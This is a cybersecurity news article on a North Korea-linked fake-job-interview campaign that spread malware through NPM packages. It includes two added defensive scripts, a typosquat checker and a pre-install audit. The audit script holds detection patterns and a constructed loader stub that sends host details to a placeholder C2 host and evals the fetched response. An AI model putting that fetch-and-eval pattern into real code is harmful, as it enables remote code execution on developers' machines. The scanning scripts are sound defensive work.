A new cyber campaign linked to North Korea is using fake developer job interviews to spread malware through 35 malicious NPM packages, cybersecurity researchers revealed this week.
Discovered by Socket Threat Research, the campaign, dubbed “Contagious Interview,” targets software engineers and developers seeking remote work. The attackers pose as recruiters on LinkedIn, sharing fake coding assignments embedded with dangerous code. Once executed, the packages deploy multi-stage malware that includes info-stealers, backdoors, and keyloggers.
Fake Interviews, Real Threats
The campaign follows a familiar Lazarus Group pattern. Threat actors send convincing Google Docs test projects, host the payloads on Bitbucket, and push victims to execute them during live screen-sharing sessions.
“These attackers pressure candidates to run code outside containerized environments while observing their actions,” said Socket researchers.
At least 24 fake developer accounts uploaded the 35 infected packages, which have already been downloaded over 4,000 times. As of today, six packages remain available on the NPM registry.
Dangerous NPM Packages
The malicious packages typosquat or mimic legitimate libraries, making them hard to detect. Some notable examples include:
- react-plaid-sdk, reactbootstraps
- vite-plugin-next-refresh, vite-loader-svg
- node-orm-mongoose, jsonpacks
- chalk-config, nextjs-insight
- *-logger, logbin-nodejs, framer-motion-ext
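The look-alike naming described above is something a developer can screen for before the first install. The following script is an added example, not code from the article or from Socket's research; it compares each dependency in a package.json against a constructed reference list of well-known npm package names and flags spellings that are nearly identical or that bolt a prefix or suffix onto a known name. The reference list and the sample manifest are constructed for the example; the package names in the sample that match the article's list are taken from it.

```javascript
// Added example, not code from the article or from Socket's tooling.
// A cheap pre-install check: compare each dependency name in a package.json
// against a reference list of well-known packages and flag look-alikes.
// The reference list and the sample manifest below are constructed for the
// example; extend the list with the packages your projects actually use.

const KNOWN_PACKAGES = [
  "react", "react-bootstrap", "react-plaid-link", "chalk", "next",
  "mongoose", "framer-motion", "vite", "vite-plugin-svgr", "bootstrap",
];

// Classic Levenshtein edit distance (insert/delete/substitute, cost 1 each),
// computed with a single rolling row.
function levenshtein(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, i) => i);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];           // d[i-1][j-1]
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];        // d[i-1][j]
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + cost);
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Collapse separators and a trailing plural so "reactbootstraps" and
// "react-bootstrap" compare equal.
function normalize(name) {
  return name.toLowerCase().replace(/[-_.]/g, "").replace(/s$/, "");
}

// Returns { verdict, reference } for one dependency name.
//   "known"      exact match with the reference list
//   "lookalike"  nearly identical spelling (typosquat candidate)
//   "extends"    a known name with an extra prefix or suffix bolted on
//   "unknown"    no relation to the reference list
function classify(name, known = KNOWN_PACKAGES) {
  const lower = name.toLowerCase();
  if (known.includes(lower)) return { verdict: "known", reference: lower };
  for (const ref of known) {
    if (normalize(lower) === normalize(ref) ||
        (ref.length >= 5 && levenshtein(lower, ref) <= 2)) {
      return { verdict: "lookalike", reference: ref };
    }
  }
  for (const ref of known) {
    if (lower.startsWith(ref + "-") || lower.startsWith(ref + "js-") ||
        lower.endsWith("-" + ref)) {
      return { verdict: "extends", reference: ref };
    }
  }
  return { verdict: "unknown", reference: null };
}

// Walk dependencies and devDependencies and return only the entries worth a
// human look, in declaration order.
function auditDependencies(pkg, known = KNOWN_PACKAGES) {
  const deps = { ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) };
  return Object.keys(deps)
    .map((name) => ({ name, ...classify(name, known) }))
    .filter((r) => r.verdict === "lookalike" || r.verdict === "extends");
}

// Constructed sample manifest mixing names from the article's list with an
// ordinary, well-known dependency.
const SAMPLE_PACKAGE_JSON = {
  dependencies: { react: "^18.2.0", reactbootstraps: "^1.0.0", "chalk-config": "^2.1.0" },
  devDependencies: { "vite-plugin-next-refresh": "^0.3.0", jsonpacks: "^1.0.2" },
};

for (const r of auditDependencies(SAMPLE_PACKAGE_JSON)) {
  console.log(`${r.verdict.padEnd(9)} ${r.name}  (close to ${r.reference})`);
}
```

The verdicts are review prompts, not proof of malice: plenty of legitimate packages extend a popular name with a suffix, which is exactly why the "extends" class exists separately from "lookalike". A name that is unrelated to anything on the list ("unknown") still deserves a look at its publisher and download history before it goes into a project.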
Multi-Stage Infection Chain
The infection begins when a victim installs a compromised package. This triggers HexEval Loader, which fingerprints the system and connects to the attacker’s C2 server. It then runs a second-stage payload using JavaScript’s eval() function.
The second stage, BeaverTail, is a cross-platform info-stealer that grabs browser data, cookies, and crypto wallet credentials. It also delivers the third stage, InvisibleFerret, a persistent backdoor that gives attackers full remote access.
The final payload includes a keylogger that captures keystrokes in real time. Though observed in only one package, researchers believe it may be reserved for high-value targets.
Malware Capabilities Include:
- System fingerprinting
- Info-stealing (cookies, credentials, crypto wallets)
- Remote access and file theft
- Screen monitoring
- Keystroke logging
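Two traits of the loader stage described above can be checked statically before a package is ever installed: code wired to run automatically during `npm install` (lifecycle scripts), and code that evaluates text it fetches at run time rather than text it shipped with. The audit below is an added example, not code from the article or from Socket's research. It reads a package manifest and a set of source files, reports install hooks and eval-style execution of fetched content, and grades the combination. The manifest, the source files and the hostname inside them are constructed placeholders, not material from a real package.

```javascript
// Added example, not code from the article or from Socket's tooling. A static
// pre-install audit for two traits the article attributes to the loader stage:
// code that runs automatically on install (npm lifecycle scripts) and code
// that evaluates text it did not ship with (eval / new Function on fetched
// content). The sample manifest and sources below are constructed strings,
// not real packages; the hostname in them is a placeholder.

// npm lifecycle hooks that execute during `npm install` with no action by the
// developer beyond installing the package.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Source patterns worth a human look, each with a reason for the report.
const SOURCE_PATTERNS = [
  { re: /\beval\s*\(/, reason: "dynamic eval()" },
  { re: /\bnew\s+Function\s*\(/, reason: "new Function() constructor" },
  { re: /\b(fetch|https?\.get|https?\.request|axios)\s*\(/, reason: "outbound HTTP request" },
  { re: /\bchild_process\b|\bexecSync\s*\(|\bspawn\s*\(/, reason: "spawns a process" },
  { re: /\bos\.(hostname|userInfo|platform|cpus|networkInterfaces)\s*\(/, reason: "host fingerprinting via os module" },
];

const isEvalLike = (r) => r === "dynamic eval()" || r === "new Function() constructor";

// Returns the reasons (in SOURCE_PATTERNS order) that match one source text.
function findPatterns(source) {
  return SOURCE_PATTERNS.filter((p) => p.re.test(source)).map((p) => p.reason);
}

// Audit one package: manifest object plus a map of file path -> source text.
// Returns { installHooks, findings, severity } where severity is
//   "high"    an install hook AND a file that both fetches and evals
//   "medium"  an install hook or eval-style execution on its own
//   "low"     neither trait present
function auditPackage(manifest, files) {
  const scripts = manifest.scripts || {};
  const installHooks = INSTALL_HOOKS
    .filter((h) => h in scripts)
    .map((h) => ({ hook: h, command: scripts[h] }));

  const findings = [];
  for (const [path, source] of Object.entries(files)) {
    const reasons = findPatterns(source);
    if (reasons.length) findings.push({ path, reasons });
  }

  const evalLike = findings.some((f) => f.reasons.some(isEvalLike));
  const evalsFetched = findings.some(
    (f) => f.reasons.some(isEvalLike) && f.reasons.includes("outbound HTTP request"),
  );

  let severity = "low";
  if (installHooks.length && evalsFetched) severity = "high";
  else if (installHooks.length || evalLike) severity = "medium";
  return { installHooks, findings, severity };
}

// Constructed sample manifest; the name is made up, not one of the article's.
const SAMPLE_MANIFEST = {
  name: "example-logger",
  version: "1.0.0",
  scripts: { postinstall: "node setup.js", test: "node test.js" },
};

const SAMPLE_FILES = {
  // Constructed loader-shaped stub: reads host details, fetches from a
  // placeholder host and evals the response. Never executed here; it is only
  // text for the scanner to match.
  "setup.js": [
    'const os = require("os");',
    'const tag = os.hostname() + "/" + os.platform();',
    'fetch("https://c2.example.invalid/stage?id=" + tag)',
    "  .then(r => r.text()).then(code => eval(code));",
  ].join("\n"),
  // Ordinary library code with nothing to flag.
  "index.js": "module.exports = (level, msg) => console.log(`[${level}] ${msg}`);",
};

const report = auditPackage(SAMPLE_MANIFEST, SAMPLE_FILES);
console.log(`severity: ${report.severity}`);
for (const h of report.installHooks) console.log(`  install hook ${h.hook}: ${h.command}`);
for (const f of report.findings) console.log(`  ${f.path}: ${f.reasons.join(", ")}`);
```

Pattern matching of this kind is a first filter, not a verdict; obfuscated code will not match and some legitimate packages do make HTTP requests. It pairs well with `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`), which keeps lifecycle hooks from running until they have been read.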
Persistent and Evolving Threat
Socket warns that the Contagious Interview campaign is still active. It follows a similar incident in March 2025, when North Korean hackers submitted another batch of malicious NPM packages linked to the Lazarus Group.
Developers seeking remote jobs are advised to treat unsolicited job offers with suspicion and avoid executing unknown code outside secure environments like containers or virtual machines.
About the author – Ayush Chaurasia is a postgraduate student passionate about cybersecurity, threat hunting, and global affairs. He explores the intersection of technology, psychology, national security, and geopolitics through insightful writing.
